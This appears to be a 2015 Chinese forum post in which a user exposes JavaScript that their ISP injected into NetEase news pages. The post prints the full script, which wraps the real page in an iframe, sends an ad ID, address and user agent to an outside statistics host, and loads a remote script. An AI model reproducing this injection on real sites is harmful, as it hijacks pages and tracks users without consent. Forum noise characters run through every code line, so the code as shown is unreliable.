|
|
本帖最后由 hudba 于 2015-2-3 00:56 编辑 3 q6 z& F: x1 w
% O4 v$ ~" P* Z- k8 D* i上网易看新闻半天打不开,发现状态栏在现实访问一个奇怪的域名。心里一惊,难道电脑中毒了?赶紧查看源代码,发现后面加了一段js,真正的新闻内容给iframe了
% [' K# R9 c, l. Q; w6 N: m
) w9 s4 s) ~2 p% \6 G- r接下来就是去搜索这个域名,得到v2ex里面也有人遇到这个问题,原来是运营商搞的鬼{:soso_e131:}
- f! C+ U; Y% j& X. ohttps://www.google.com/search?q=info.hfjuki.com&ie=utf-8&oe=utf-8 http://www.v2ex.com/t/142197
% r, ?8 M& m3 Z顺便查下ip138:5 j: L& D8 q/ n, {2 ~& W1 c
7 ]. a$ u1 I) G" h这是那段js里面的代码,好象是个半成品还没写入广告数据:4 N# r5 C8 H) @, H4 `! U
- function locationSearch() {
1 d( ^4 j! y( }0 P) o, D - var s = getMainJs();0 h5 [" ~$ M) @% I3 j8 h
- if (s == null) {( L3 ~4 r) A+ T3 C. q& ?
- location.reload();2 J: p1 c& K( W3 h" L5 S# {5 V
- }
: P" N }) V! `$ G. v8 l) W - return s.src.substring(s.src.indexOf(".js?") + 3, s.src.length);7 T2 U3 [$ L/ O2 \3 J" x" e6 S
- }9 @0 p( Z3 U& M$ t4 {
( Y' A4 k! l$ q- function getParameter(name, paraStr) {
4 X. H3 H* \4 P) G$ Y - var result = "";: }! s1 Z. U) D: _. d8 h
- var str = "&" + paraStr.split("?")[1];
- ]) b" e4 E$ `; K. Z4 A - var paraName = "&" + name + "=";! Q2 i% B/ q! `4 \0 v9 J
- if (str.indexOf(paraName) != -1) {
1 H9 E9 B( j+ y# Q5 {( `6 n% B5 i4 ] - if (str.substring(str.indexOf(name), str.length).indexOf("&") != -1) { r5 X7 u0 Y* f' \; Q, X
- var TmpStr = str.substring(str.indexOf(paraName), str.length);
' f1 {6 o+ ?9 E/ x. o; | - result = TmpStr.substr(TmpStr.indexOf(paraName), TmpStr.substring(* w' N% A% f m- H
- 1, TmpStr.length).indexOf("&")
3 w8 T0 U0 l8 i( [8 C# X - - TmpStr.indexOf(paraName) + 1);
; u, Y: W/ ^, V6 N; g0 c2 n - } else {
8 \/ T% h+ Q! c5 _/ i - result = str.substring(str.indexOf(paraName), str.length);# j- X1 _, o. b9 k8 ^5 X! r
- }8 }9 w* J6 i7 F* I" y
2 k) j& E, E# D& ^6 G1 b* h- result = result.substring(result.indexOf("=") + 1, result.length);' g/ g6 ?( @% _ X# Q+ a9 M
- } else {
) T6 }/ H$ K( K - result = "No such parameter";" U3 m- ^0 V4 M0 {* Y' h
- }
+ \; y; w4 f% y- k - return (result.replace("&", ""));
( q) R! Y6 L7 M8 H: N - }
0 x9 p/ {2 k- U' o3 E" ~; j' p
1 T. k( P, I2 j4 k% F% m3 Y) {- function getMainJs() {
+ Q) C* H K8 w8 |# } - var scripts = document.getElementsByTagName("script");
8 G/ C! q9 [+ V u+ I0 v( A - var s = null;7 \7 ~% }. B0 b6 }( h; t/ v' s
- for (var i = 0; i < scripts.length; i++) {" M1 ^) z4 c' L: S! p
- if (scripts[i] != "undefined" && scripts[i].src.indexOf("t_c") != -1) {
5 c+ D3 s6 i _+ W) _0 Z7 q - s = scripts[i];
& S7 z. @% W8 F. ]: n - break;
& j$ q) B/ j$ G+ ?7 _ - }
7 q1 C" _8 ^& R- L$ [6 e( G - }
`3 g5 s! Z8 p: |$ L, L- g - return s;7 ~$ p! L: S) q# }: \$ G
- }# s& n5 j! @' `
- . t' T8 G9 j) A! I& x/ F' B1 b
- function appendParam(oStr, aStr) {
7 h& r i0 c; J$ _" a- W - if (oStr.indexOf('?') > 0) {
1 d& u8 @; k M - oStr = oStr + "&" + aStr;
) [7 m; M0 k3 Z; I @ K0 `! o* k( ~ - } else {' r! w( {$ M# H
- oStr = oStr + "?" + aStr;8 c# D6 T5 a' m
- }6 J @9 `8 F8 l% m( U# w3 K. b' e
- return oStr;7 i1 {% `6 K) ?: H' @9 o% d, O
- }1 L* W+ Q6 `3 G3 h$ h
- 0 [; G$ e+ ?# p5 \4 \0 t$ ]& C
- window.onerror = function() {
8 a* x, N! P3 K - };# p6 V+ E H: ]
- 1 Y2 j& a& z% A& F9 |! w$ O
- var g_titleTime = 0;, J' N) G# F3 s. ^! q+ k& m; w
- function setTcTitle() {
. L) F# B9 X* b" [ - if (undefined == document) {% q% G* F; A% L& }- z. q, }
- g_titleTime++;0 X+ Z, b8 m M$ y, L' ?
- setTimeout("setTcTitle();", 1000);; p# ~% [5 h( C
- return;% I' W a' J/ N7 @5 F1 t
- }
8 M9 I6 Z; e1 w1 w% y' U - , @. Z5 `' o9 {2 L& f+ z5 q, l& Z
- var doc;' e7 V* G8 h& l# P
- try {
$ P1 [3 x& {/ h/ Y) P8 \7 s - if (document.all) {4 J5 J- I9 n/ h) j! p0 j8 c. X5 k
- doc = document.frames["cn"].document;8 [* m7 C, C9 N# G2 ^0 v
- } else {
* Y, s8 _8 S* T - doc = document.getElementById("cn").contentDocument;* d( y; ~) u0 e9 n
- }. m& @% x$ q/ S l% O
- } catch (ex) {
4 O- \1 D8 Q# U# k - }2 D" r- x/ U" L7 E
6 Y* M% r6 w$ |1 D1 f4 u- if (g_titleTime < 5 l' Y0 a2 i* J, i0 t
- && (undefined == doc || undefined == doc.title || "" == doc.title)) {" F7 x+ y7 E1 B% B- U
- g_titleTime++;* t, ]6 E0 N! w# |
- setTimeout("setTcTitle();", 1000);3 l6 `; p( }. h. }5 r$ V6 o# L5 `
- return;
1 p6 h4 o! C8 I, V - } else if (undefined != doc && undefined != doc.title && "" != doc.title) {
4 f( X0 k6 H- X3 _2 i - document.title = doc.title;
$ f. b1 S# j/ m% [5 T* \: S - setTcAdvVisible();
- ?4 d& Z8 U8 H5 `4 T3 |# X - }
% D- ]3 G9 W3 t: j1 l - }& R% u* A" }4 g' t0 k7 Q
- : k3 R/ [& z( ?& h$ K7 m$ J C
- setTimeout("setTcTitle();", 1000);
& j+ |( C/ E- v! K% W - 9 ]3 z& |/ u8 e0 l0 X* z( a+ o
- var g_isHaveVisible = false;
- L6 D+ y% B Z, \4 k! | - function setTcAdvVisible() {
0 e4 ~. F9 j* h" ?$ v6 Z - if (undefined != document && undefined != document.getElementById("addiv")) {& x* U [2 a
- && !g_isHaveVisible) {
) U. I3 u: d s$ F - document.getElementById("addiv").style.visibility = 'visible';4 c* G3 z$ {( Z5 k6 p1 _! [* t
- document.getElementById("addiv").style.display = 'block';% _' G3 \. A+ k4 L; H
- g_isHaveVisible = true;) T- q/ V, { |6 W. T3 X$ A
- }- l2 D7 W# z0 U+ I+ i
- }' ?' R+ r5 N9 n3 \# x2 m+ ^
- # g( [" I7 S3 u, d1 D
- function UrlAnalyzer() {8 c0 u3 o( w+ ^( z8 q9 J
- this.divda = "";
9 h5 w. O/ @( H1 O/ Z - this.tctype = "";, Y+ m [9 J+ V9 G& i9 W" p
- this.radius = "";
. B! H! `+ p9 x( O( S - this.rlu = "";5 d) W5 F O4 i) d
- }9 I9 a5 a D$ E) ^+ x
- 9 h& ~" W8 S2 ^: B3 h
- UrlAnalyzer.prototype.initParameters = function() {
8 e, v4 M2 s8 d. Z9 v2 a0 y7 c+ Z - var paraStr = locationSearch();
' \' c" P( C! K+ u3 l7 n5 J - this.rlu = getParameter("lruedct", paraStr);6 |2 `% E+ Q1 m' A! L
- this.divda = getParameter("divda", paraStr);# w3 E+ \6 U! ], S
- this.radius = getParameter("radius", paraStr);
5 Z+ i3 B/ N$ ~- f+ w1 ^% l - this.tctype = getParameter("tctype", paraStr);$ `' P3 L2 c0 t2 g& V
- this.address = getParameter("address", paraStr);
3 M/ u3 t8 O W% t0 E - this.usagent = getParameter("usagent", paraStr);! D- |; e% J1 t5 D/ J) S2 w3 ^- `
- }
) b5 d, u$ T8 _2 T3 S" C/ z6 p - ) k8 w) Q2 A: t0 ?
- UrlAnalyzer.prototype.getHtmlDoc = function() {
+ }+ w% [- k8 f0 j O. G" ? - var doc;
. g" C' R% [, I- L/ N0 `( c3 g - try {# v5 ^/ u- Z- p7 Y# u1 ^7 Y
- if (document.all) {& t8 |" {5 o7 S/ J" c% ]
- doc = document.frames["cn"].document;
3 P! j2 A K y, e0 {- U6 T# V - % y2 ?$ S% I8 A U% _" n7 n" }
- } else {6 V6 D4 g. u' ]8 _: H
- doc = document.getElementById("cn").contentDocument;/ ~7 o& p! Q% `# y! d4 r) Q# V, q$ C
- // doc = document.getElementById("cn").contentWindow.document; h( i* h, s. ?) ] b
- }
2 x& H. X: B$ Y' C) S; F" K+ l - } catch (ex) {
% c& `! W: a" j - }7 r7 ^2 ^( ^2 q$ p5 S
- return doc;
' c2 U, b8 o9 q - }
. p/ m. k+ H: B1 o- F
- O: C D8 f* H9 V" u. v- UrlAnalyzer.prototype.setDomain = function() {
" h0 ]2 X% V2 U - if (undefined != document.title && "" == document.title)
) z( q, z b+ i* A - {
& R5 v/ `2 W* C2 b9 q - var index = document.domain.indexOf(".");5 c/ V7 {% {$ e6 B/ g' }
- if (undefined != index && -1 != index) {
+ t7 N7 _& ?1 v4 Q8 C - document.domain = document.domain.substring(index + 1,
5 J8 {1 ]! g/ t1 g - document.domain.length);
' E0 L( k$ K$ y- v# j - }
7 l" m3 s9 R7 P2 T4 g -
2 G: L: c. ]; }( { - var doc = this.getHtmlDoc(); Q k' r) Y+ B+ b: _; ]
- if (undefined != doc && undefined != doc.title && "" != doc.title) {# Q/ W8 v3 |9 R2 f D
- document.title = doc.title;
2 m! b4 o' T( q) n4 e- J - setTcAdvVisible();
m/ l. n1 _2 x E p4 F - }
0 X1 o! b0 t8 g - } y4 k' T) D# A2 a! p. i
- }% Z. q* b2 i2 B6 X
3 V6 A, f- K3 v! c6 d9 [ y8 \- UrlAnalyzer.prototype.iframeCallback = function() {* W# ?+ z* a- b6 p" {6 o
- var doc = this.getHtmlDoc();
( Q a9 {6 x# ~% s6 p; b& A6 y" T9 M1 ` - if (undefined == doc || undefined == doc.title || "" == doc.title) {/ q% ] d1 j9 s8 ]6 \
- if (undefined != document.domain) {0 z' ^2 U8 f5 ~
- e+ _! `+ x6 ~$ h8 C- var self = this;1 s3 q" D. L. I* ?2 k7 b1 G
- setTimeout(function(){self.setDomain.call(self, null)}, 1000);
' e! k9 c5 U/ U - // var index = document.domain.indexOf(".");
4 W* s+ k" i9 l1 U; t+ \" d( Q0 K( K - // if (undefined != index && -1 != index) {3 _. N! J1 h# ?: }$ a/ C2 @+ N
- // document.domain = document.domain.substring(index + 1,* \2 D/ j; m% Z. U
- // document.domain.length);
# W. n0 G' R6 Q: O$ W; i - // }
, C. S2 q+ d8 b$ L% U# _2 h) v+ V) c - //( N- U2 W! e' @1 V" f; b
- // var doc = this.getHtmlDoc();5 e2 j% S- I' a5 w1 {
- // if (undefined != doc && undefined != doc.title && "" !=
& B- W4 v; S( I; j - // doc.title) {
7 [4 Y4 t" H. T: @" n9 G - // document.title = doc.title;
/ E/ {9 h7 v& N% ]4 ~3 b - // setTcAdvVisible();" S9 \& ^# z, E/ x5 M0 j9 _
- // }2 i+ n. Z" D, U, H
- }! Q' b- X& k' ?2 d0 u1 [
- } else if (undefined != doc && undefined != doc.title && "" != doc.title) {
+ P5 N Z9 H" K2 v2 |- E( ~ - document.title = doc.title;
6 _ S4 |; j" } - setTcAdvVisible();- ~ p# H! S. M! G+ N- s: D. v
- }
6 ]' r( S( H$ N# j - }
6 D- Z# i' h- V' {0 H) G/ l8 ~ - ; l! [4 f$ P/ `( I9 n: K/ \
- UrlAnalyzer.prototype.executeHtmlContext = function() {/ I7 ~' ]0 e) K7 Z* r/ Q
- var staUrl = "http://info.hfjuki.com:8060/page/statistics?advId=" + this.divda
5 S! w$ M1 \* x g - + "&rd=" + this.radius + "&tctype=" + this.divda + "&address=" + this.address + "&usagent=" + this.usagent;
) J* K9 z. ~# v
* y$ v w, e, P5 l% T8 Z- var htmlStr = "<iframe src="" + staUrl3 @: i6 j: z b D; O
- + "" style="display:none"></iframe>";
3 o, z" H# u2 v: Z2 a: ` - 0 ^, `1 t3 {( B' ^ q4 r! x
- var advUrl = htmlStr
4 z8 p z; B2 c1 K: f& O - + "<script src="http://c2.sxite.com:8060/center?advId="
4 q! O, k2 `+ ]! h5 ^9 [3 \ - + this.divda + "&radius=" + this.radius + "&area=1" + ""><\/script>";
4 s* F5 ^1 @: D: j0 ` - document.write(advUrl);
0 K# F) q: G/ d# M& K1 W* v, H1 y - & U L. u8 K$ [' q" S: B
- var self = this;) {$ S4 L4 s5 {' |, c' r" K) `5 M- L
- var iframe = document.getElementById("cn");" X# O4 Q2 l+ Q$ m
- if (iframe.attachEvent) {1 ]4 N( W" _6 ~& G8 W' q6 v5 q
- iframe.attachEvent("onload", function() {
, j1 J- [6 A7 _7 K5 O! T - self.iframeCallback.call(self, null);/ u- t* B/ _: C" s) e4 e* c
- });
# h S0 L4 g2 S* | - } else {
6 u6 x. S! T y" E ~ - iframe.onload = function() {
" ]* [( K) h% a* V5 k# n - self.iframeCallback.call(self, null);
' q5 [3 p6 n. k5 L1 C4 ] - }
8 n' t! W `2 J9 M0 Q1 z: C3 S - }; y5 b; O! d ]. v
- }8 U: [& z) g" ~; p1 C
5 \4 K$ O4 y8 b" C) D. J" d, \. g- UrlAnalyzer.prototype.executeMain = function() {4 H5 }$ ^' e) R3 l+ i- r0 d
- var mainFrame = document.getElementById("cn");* a$ t5 G4 D G7 `/ g: S+ v
- mainFrame.contentWindow.location.href = mainFrame.src;; v; a6 p/ @2 h/ O
- this.initParameters();
. d" M$ B3 \: T4 k- A - this.executeHtmlContext();; Q9 g7 w2 [3 U6 f- k/ V' G
- }
/ k2 x' ]; z0 u8 B
8 A" l/ x7 m% S1 _/ D) |- var g_analyzer = new UrlAnalyzer();. G6 C: U$ o7 \" L1 l# L
- g_analyzer.executeMain();5 p4 z6 n: h; |, k5 R6 k
+ l* R* z a( K( r& t$ |/ U
% d5 o' d5 T6 p; C5 f( _: h% W+ h3 N l4 k+ l: M, p& I/ a% ] B
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?立即注册
x
|
发表于 2015-2-3 00:52:03
发表于 2015-2-3 04:58:09
发表于 2015-2-3 09:49:12
